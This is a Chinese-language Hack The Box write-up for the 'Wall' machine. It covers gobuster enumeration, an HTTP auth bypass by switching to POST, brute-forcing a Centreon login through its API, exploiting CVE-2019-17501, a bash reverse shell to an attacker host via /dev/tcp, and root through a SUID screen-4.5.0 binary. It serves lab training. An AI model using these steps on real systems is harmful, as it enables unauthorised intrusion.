Hack the box_Wall靶机
信息枚举
masscan扫描开放端口
nmap探测22,80端口的服务信息,发现被过滤了
利用gobuster扫描web
->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157
->/.hta (Status: 403)
->/.htpasswd (Status: 403)
->/.htaccess (Status: 403)
->/index.html (Status: 200)
->/monitoring (Status: 401)
->/server-status (Status: 403)
只有monitoring有点用,不过monitoring需要认证才能登录发现只要把访问方式改为POST就能绕过认证进去发现这是一个centreon系统(Centreon是一个网络,系统,应用程序监督和监视工具)登陆处有一个csrf令牌验证,每次访问都会更改
在官网中得知,我们访问/api/index.php?action=authenticate,并且提供登录登录信息,将可以绕过令牌校验,从而达到爆破目的
我们使用Seclist字典进行爆破密码为 password1
我们发现了系统版本为19.04.0
低权限shell
该系统存在CVE-2019-13024漏洞,不过当我使用poc尝试攻击时,发现poc用不了,payload有一个过滤处响应403 后来我发现了CVE-2019-17501,这个要简单一点在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中写入bash并用SimpleHTTPServer上传自己的webshellwebshell如下
->#!/bin/bash
->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1
再次写入bash命令获得反向连接shell
->bash /tmp/n00b.sh
并且获得TTY终端
权限提升
在使用自动化脚本枚举系统信息中发现系统中有一个不常见的suid二进制文件:
/bin/screen-4.5.0
使用poc获得root权限
最后我们得到了user.txt、root.txt
- 点赞
- 收藏
- 关注作者
评论(0)